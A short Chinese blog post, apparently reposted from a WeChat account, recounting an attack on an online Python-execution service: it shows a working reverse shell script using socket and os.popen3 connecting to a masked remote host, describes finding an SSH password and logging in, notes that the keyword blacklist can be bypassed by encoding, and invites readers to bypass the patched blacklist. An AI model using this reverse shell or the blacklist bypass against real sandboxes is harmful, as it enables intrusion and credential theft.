看到某公众号提供"Python在线编写"功能,于是测试了几个函数.
以下常规的都被过滤了
os.systemos.popen subprocess commands然后试试os.popen2/3/4发现可以import,同时socket也可以使用
这样就写了个反弹shell的脚本:
import socketfrom os import popen3 s = socket.socket() s.connect(('xx.xx.xx.xx', 12345))for i in range(10000): ans = popen3(s.recv(1024)) s.send(ans[1].read() + ans[2].read())敲进去
这边用nc监听,拿到shell
发现敏感文件,验证了一下是ssh的密码,登入之后就可以执行交互式的命令了
帐号权限比较低,不过还是有些信息泄漏
看到服务器的源码,针对用户输入采用黑名单过滤.这样的in判断直接编码一下就能绕过。
以上漏洞已被修复,网站的维护人员把os.popenX 和 eval open( 都加入了上面的黑名单,那么问题来了:
以该黑名单的判断方式,现在怎么绕过?
你认为关于该类线上编程服务安全性的解决方案是什么呢?
点击原文可以跳转到该网站进行测试。
欢迎留言及回复交流。
原文始发于微信公众号(乐枕迭代日志):Python在线编程的安全问题
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论